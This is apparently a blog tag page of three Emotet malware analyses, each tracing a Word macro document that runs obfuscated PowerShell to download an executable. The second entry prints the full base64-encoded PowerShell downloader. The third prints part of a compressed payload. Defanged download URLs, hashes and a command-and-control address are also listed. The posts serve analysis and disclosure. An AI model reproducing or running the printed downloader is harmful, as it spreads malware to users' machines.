Tag Archives: Emotet

Trojan downloader word macro


SHA256 – 4221a9922d97fa329b3dbb27e37522448958cbfa186a6ef722e48d63f9753808

Download link – VirusTotal

I downloaded this word document and checked whether macro present and it auto executes on opening document.

Yes, it does and it has obfuscated strings too.

blg5-05132019.PNG

I opened document and navigated to > Views > Macros > View Macros > Selected “autoopen” > Edit

blg5-05132019-3.PNG

I renamed autoopen() to autoopen2. (Which you can see in above screenshot)

blg5-05132019-4.PNG

while debugging macro, found it executed PowerShell script in obfuscated form.

blg5-05132019-5

blg5-05132019-6.PNG

After deobfuscate, below is the PowerShell script.

blg5-05132019-7.PNG

On debugging PowerShell script, it tries to download 685.exe from one of below URL’s

blg5-05132019-9.png

blg5-05132019-8.PNG

http://duanlocphatresidence%5B.%5Dcom/wp-admin/b8oyf2_w724r5u-66253
http://superwhite%5B.%5Dcom%5B.%5Dau/wp-content/2t9x_bmoau88p-89600496
http://pneumorek%5B.%5Dma/calendar/EckAzvvl
http://pure-vapedistribution%5B.%5Dbe/p52r/js74mi_zk0p5orhwa-651
http://nitincarcare%5B.%5Dcom/wp-content/BbayinbUK

and drops PE file at location C:\Users\<user>\685.exe

blg5-05132019-10.png

While debugging PowerShell script, I tried to hit the download script but found none of above URL’s has PE file.

The file is removed from all URL’s.

Below is VirusTotal score.

blg5-05132019-11.PNG

 

Word macro drops Emotet malware


SHA256 : 1043dd7647105b035acbc027e0fa448f329ea5620956a1ba82dc254fc7bd6e29

I have downloaded word document for analysis from VirusTotal

I checked file with Oletools to verify macro exist and is it auto executable.

In below screenshot, it can be seen, the macro is present and auto executable.

Blg4-30042019-4.PNG

I opened word document and Enabled Editing.

Blg4-30042019.PNG

Views > Macros > View Macros > Select Autoopen > Edit

I renamed autoopen() to autoopen2() so it will not execute on document open.

I started debugging VBA and found base64 string which executes PowerShell script to download a malicious file from remote server.

Below is the base64 string used in macro

Blg4-30042019-1.PNG

JABRAEEAQQBBAFUAVQBDAD0AKAAiAHsAMAB9AHsAMgB9AHsAMQB9ACIALQBmACAAJwBHAEcAJwAsACcAQQBDACcALAAoACIAewAxAH0AewAwAH0AIgAtAGYAJwBBAEMAJwAsACcAawBaACcAKQApADsAJAByAEcAQQBYAEEAQQBBAG8AIAA9ACAAJwA2ADAANAAnADsAJABDAEIAVQB3AHg ANABBAD0AKAAiAHsAMQB9AHsAMAB9AHsAMgB9ACIALQBmACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAgACcAWABBACcALAAnAEcAQgAnACkALAAnAFEAJwApACwAJwBvACcALAAnAHgAYwAnACkAOwAkAHYAVQBfAG8AYwAxAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJAByAEcAQQBYAEEAQQBBAG8AKwAoACIAewAxAH0AewAwAH0AIgAtAGYAIAAnAGUAeABlACcALAAnAC4AJwApADsAJABuAEMAMQBCAEMAMQA9ACgAIgB7ADEAfQB7ADIAfQB7ADAAfQAiAC0AZgAgACcAQgAnACwAJwBXAEEAJwAsACcAWABEAHgAJwApADsAJAB6AEEAQQBrAEIAQgA9AC4AKAAnAG4AZQB3AC0AJwArACcAbwBiACcAKwAnAGoAJwArACcAZQBjAHQAJwApACAATgBlAFQALgBgAFcAZQBCAGAAQwBsAEkAYABlAG4AdAA7ACQAUwBBAGsAXwBBAEIAQQA9ACgAIgB7ADEANQB9AHsAMwA5AH0AewAyADEAfQB7ADEAMQB9AHsANAA0AH0AewA0ADMAfQB7ADIANwB9AHsAMQA4AH0AewAyADQAfQB7ADQANQB9AHsAMwAxAH0AewA0ADYAfQB7ADMAOAB9AHsAMQAyAH0AewAzADUAfQB7ADIANQB9AHsAMgAzAH0AewAxADkAfQB7 ADQAfQB7ADQAMAB9AHsANAA5AH0AewA0ADcAfQB7ADEAfQB7ADQAOAB9AHsANwB9AHsAOAB9AHsAMQA3AH0AewAxADMAfQB7ADMANgB9AHsAMwA3AH0AewA1AH0AewAzADMAfQB7ADMAfQB7ADQAMQB9AHsANgB9AHsAMgB9AHsAMAB9AHsAOQB9AHsAMgA5AH0AewAxADYAfQB7ADMAMgB9AHsAMgAwAH0AewAyADIAfQB7ADQAMgB9AHsAMQAwAH0AewAyADgAfQB7ADMAMAB9AHsAMgA2AH0AewAxADQAfQB7ADMANAB9ACIAIAAtAGYAIAAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAnAHMAJwAsACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAnAC8ATABvACcALAAnAEsAUwAnACkAKQAsACcAawAyAC8AJwAsACgAIgB7ADIAfQB7ADAAfQB7ADEAfQAiAC0AZgAgACcAcAAnACwAKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAIAAnAGEAJwAsACcAZwBlAC8AYwBzACcAKQAsACcALwAnACkALAAnAC4AJwAsACgAIgB7ADAAfQB7ADEAfQAiACAALQBmACAAKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAJwBlAHIAJwAsACcAcwBhACcAKQAsACcALgAnACkALAAnAG0AbQAnACwAJwBiAHMAJwAsACcAOgAnACwAJwAvACcALAAoACIAewAxAH0AewAwAH0AIgAtAGYAIAAnAEAAaAB0ACcALAAnAC8AJwApACwAKAAiAHsAMQB9AHsAMAB9ACIALQBmACAAJwByAGUAJwAsACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAnAGUAJwAsACcALwAvAHQAJwApACkALAAnAC0ASQBaACcALAAnAHQAcAAnACwAJwBnACcALAAnADAANAAnACwAKAAiAHsAMAB9AHsAMgB9AHsAMQB9ACIAIAAtAGYAKAAiAHsAMQB9AHsAMAB9ACIALQBmACAAJwBwACcALAAnAGgAdAB0ACcAKQAsACcALwBiACcALAAnADoALwAnACkALAAnAGEAYwAnACwAKAAiAHsAMwB9AHsAMAB9AHsAMgB9AHsAMQB9ACIALQBmACgAIgB7ADAAfQB7ADEAfQAiACAALQBmACAAJwBwAGgAaQAnACwAJwBrAHUAbgBwACcAKQAsACcAbwAnACwAJwByACcALAAnAC8AJwApACwAJwBTADkAWAAnACwAJwBiACcALAAoACIAewAwAH0AewAxAH0AIgAtAGYAIAAnAC8AUwAnACwAKAAiAHsAMQB9AHsAMAB9ACIALQBmACcAZQAvAEAAJwAsACcARwAnACkAKQAsACgAIgB7ADAAfQB7ADIAfQB7ADEAfQAiAC0AZgAgACgAIgB7ADIAfQB7ADAAfQB7ADEAfQAiACAALQBmACAAJwBtAC8AJwAsACcAWABhACcALAAnAGMAbwAnACkALAAnAEsAJwAsACcAYQAnACkALAAnAGgAJwAsACcAYQAnACwAJwBfAHkASAAnACwAJwAvAC8AbAAnACwAKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAIAAnAGIAJwAsACgAIgB7ADEAfQB7ADAAfQB7ADIAfQAiAC0AZgAnAC8AaQAnACwAJwBlAHMAdAAnACwAJwA0ACcAKQApACwAJwB4ACcALAAnAGIAaQAuACcALAAoACIAewA0AH0AewAwAH0AewAxAH0AewAzAH0AewAyAH0AIgAtAGYAKAAiAHsAMQB9AHsAMAB9ACIALQBmACAAJwBrAGUAZQAnACwAJwBiAHIAaQAnACkALAAnAC4AYwAnACwAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAJwB0ACcALAAnAC8AYwBvAG4AJwApACwAJwBvAG0AJwAsACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAnAHQAcAA6AC8AJwAsACcALwAnACkAKQAsACgAIgB7ADAAfQB7ADEAfQAiACAALQBmACcAYwBvAG0AJwAsACcALwAnACkALAAoACIAewAwAH0AewAxAH0AIgAtAGYAIAAnAGoALQBhACcALAAnADMAJwApACwAJwB0ACcALAAnAGkAbgBnACcALAAnAC8AJwAsACcAOgAnACwAJwByACcALAAnAGEAJwAsACgAIgB7ADIAfQB7ADEAfQB7ADAAfQAiAC0AZgAnAEAAaAB0ACcALAAnAC8AJwAsACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAgACcAUQAnACwAJwBzAEMASwAnACkAKQAsACgAIgB7ADEAfQB7ADAAfQB7ADIAfQAiAC0AZgAgACcAcwAnACwAJwBlAHkAJwAsACcAZQBsAC4AJwApACwAJwBjAG8AbQAnACwAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAJwAvACcALAAnAGMAbwBtACcAKQAsACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAnAHAAOgAnACwAJwB0AHQAJwApACwAKAAiAHsAMAB9AHsAMgB9AHsAMQB9ACIAIAAtAGYAJwByACcALAAnAEEAbQAnACwAJwBzAGIAeQAnACkALAAnAFcAcQAnACwAKAAiAHsAMAB9AHsAMQB9ACIALQBmACAAKAAiAHsAMAB9AHsAMQB9ACIALQBmACcAcgBqAHMAJwAsACcAagAnACkALAAnAGgARQAnACkALAAnAC8AdAAnACwAKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAJwAvADkASgAnACwAJwBEACcAKQAsACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAgACcAQAAnACwAKAAiAHsAMQB9AHsAMAB9ACIALQBmACcAdAB0AHAAJwAsACcAaAAnACkAKQAsACgAIgB7ADAAfQB7ADEAfQAiACAALQBmACAAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAnAHQAZQAnACwAJwAvAGgAbwAnACkALAAnAGwAJwApACkALgAiAHMAYABwAGwAaQB0ACIAKAAnAEAAJwApADsAJABZAEEAQwBBAEEAMQBHAD0AKAAiAHsAMQB9AHsAMAB9ACIALQBmACcAWgAnACwAKAAiAHsAMQB9AHsAMAB9ACIALQBmACAAKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAJwBBAEQAQQAnACwAJwBBACcAKQAsACcAaQB4ADEAJwApACkAOwBmAG8AcgBlAGEAYwBoACgAJABpAEEAQQBRAEIAQQBBACAAaQBuACAAJABTAEEAawBfAEEAQgBBACkAewB0AHIAeQB7ACQAegBBAEEAawBCAEIALgAiAGQAbwBgAFcATgBMAE8AQQBEAGAARgBgAEkATABlACIAKAAkAGkAQQBBAFEAQgBBAEEALAAgACQAdgBVAF8AbwBjADEAKQA7ACQAYgBBADEAXwBDAEEAPQAoACIAewAxAH0AewAwAH0AewAyAH0AIgAtAGYAJwBRAEcAJwAsACcAQgAnACwAJwBaAEEAMQAnACkAOwBJAGYAIAAoACgALgAoACcARwBlACcAKwAnAHQALQBJACcAKwAnAHQAZQBtACcAKQAgACQAdgBVAF8AbwBjADEAKQAuACIATABlAGAATgBnAFQASAAiACAALQBnAGUAIAAzADUANgAwADEAKQAgAHsALgAoACcASQBuAHYAbwBrAGUALQBJAHQAJwArACcAZQAnACsAJwBtACcAKQAgACQAdgBVAF8AbwBjADEAOwAkAEMAQQBRAF8AQQBCAD0AKAAiAHsAMAB9AHsAMQB9AHsAMgB9ACIAIAAtAGYAJwBPACcALAAnAEEAQgBEACcALAAnAEQAUQA0ACcAKQA7AGIAcgBlAGEAawA7ACQAegBHAFgAQQB4AGsARAA9ACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAoACIAewAwAH0AewAxAH0AIgAtAGYAJwB3ACcALAAoACIAewAwAH0AewAxAH0AIgAtAGYAJwBBAEQAWABjACcALAAnAFEAJwApACkALAAnAEEAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABYAFEAQQAxAFgAQQBBAD0AKAAiAHsAMAB9AHsAMQB9ACIALQBmACcAZgBBACcALAAoACIAewAxAH0AewAyAH0AewAwAH0AIgAgAC0AZgAnAEEAMQAnACwAJwBHAHgAJwAsACcARABBACcAKQApAA==

After decoding base64 string, I got below PowerShell script.

Blg4-30042019-2.PNG

On debugging PowerShell script, I found, it downloads 604.exe file from one of multiple sources and drop at location C:\Users\<username>\604.exe

Blg4-30042019-5.PNG

below are the URL from where it tries to download the malicious executable file.

Blg4-30042019-7.PNG

http[:]// beysel[.]com/XaaK-IZWqrsbyAmxS9X_yHrjsjhEj-a3/tQsCK/
http[:]// labersa[.]com/hotel/9JDk2/
http[:]// phikunprogramming[.]com/bs/page/css/LoKS/
http[:]// brikee[.]com/contact/SGe/
http[:]// terebi[.]com/best/i404/

I got this file at location C:\Users\<username>\604.exe

Below is 604.exe file version.

Blg4-30042019-6.PNG

Below is SHA for this executable.

SHA256 – 48260C3FFE79F8CF498502778C192A2CFCA7B69866141A9A88FA75B0D0093557

Here is [VirusTotal link]

This is executable is Emotet.

 

Emotet malware analysis


VirusTotal sample – c9bdfb2d6ac9e493bc391b2f64b48d8d5cde10645ea921951b23112e6d73545c

File Type: Microsoft Word Document

Document Property:

I have used Oletools to analyse word document properties and analyse content.

wm2.PNG

wm3.PNG

This word document has VBA macros.

After parsing word document using olevba, this tells, file has suspicious hex string and Base64 strings.

And file has below macros,

  • LUDoB_BX.cls
  • fkkkCAk.bas
  • ZAAcAA.bas

And macros will auto execute on opening document

wm4.PNG

I start debugging macros in word document,

wm5.PNG

After Enable Editing, Open View Macros under View tab

wm6

wm7

Click on Edit and change autoopen() function to autoopen2().

wm8

There are many small chunks of Base64 strings which¬† are concatenating and creating a PowerShell script I have captured the Base64 string in text file and tried to decode. I didn’t get the complete base64 but some part of it and can be recognized it is PowerShell script.

wm14.PNG

(nEw-OBJECt sySTeM.Io.comPReSsIOn.dEfLatEstReAM( [Io.mEMORystREam] [coNverT]::FrOMbase64stRING((‘ZZJh’+’i’+’5’+’tAEIb/y’+’n’+’4’+’QNiFVz9YP5US4MbYSS’+’gOmhLN’+’H’+’QXQz’+’6kbd9XSjOUL’+’+e’+’zdtJbSdb7s87z’+’vDO2’+’O8g’+’q5’+’z4P’+’r0E’+’EA’+’an8’+’OI’+’esbXKA5TGfoCJ1PmR2SK’+’bFFZz5ivG45’+’CecZrKJMA’+’wKeV’+’Ut2jbW’+’M’+’7
IArsj9xisrWnzmRSKI3’+’a’+’u’+’9’+’2Xk/10wwbNVRmTQ6npG’+’csO’+’LRe24’+’zjuHZq’+’m’+’yaoy’+’c’+’chPvF’+’F’+’Z1w3/e’+’k4’+’f’+’FLs9Cl’+’7aT’+’v5’+’b+EfXv2Wi63FQv’+’zSs5Gau/Y/’+’tJ’+’7m9N’+’xiwH3nBR/’+’zPeDdubW’+’p96xquFvSJLj1j1Pk44’+’L74N’+’N’+’iDT

during debugging, I got the below values are stored in the variable YAAAAAA and it is reading registry key values.

wm9

wm10

wm13.PNG

while debugging, I captured traffic using WireShark and found, connection has been made to web site emseenerji[.]com at IP 94[.]73[.]147[.]237. URL is still alive and can be accessed.

wm11.PNG

wm12.PNG

The complete URL which was accessed by this program http:// emseenerji[.]com/wp-content/RRKu/

My host machine AV blocked this URL and I couldn’t analyze traffic further from this URL to my VM.

Thank you.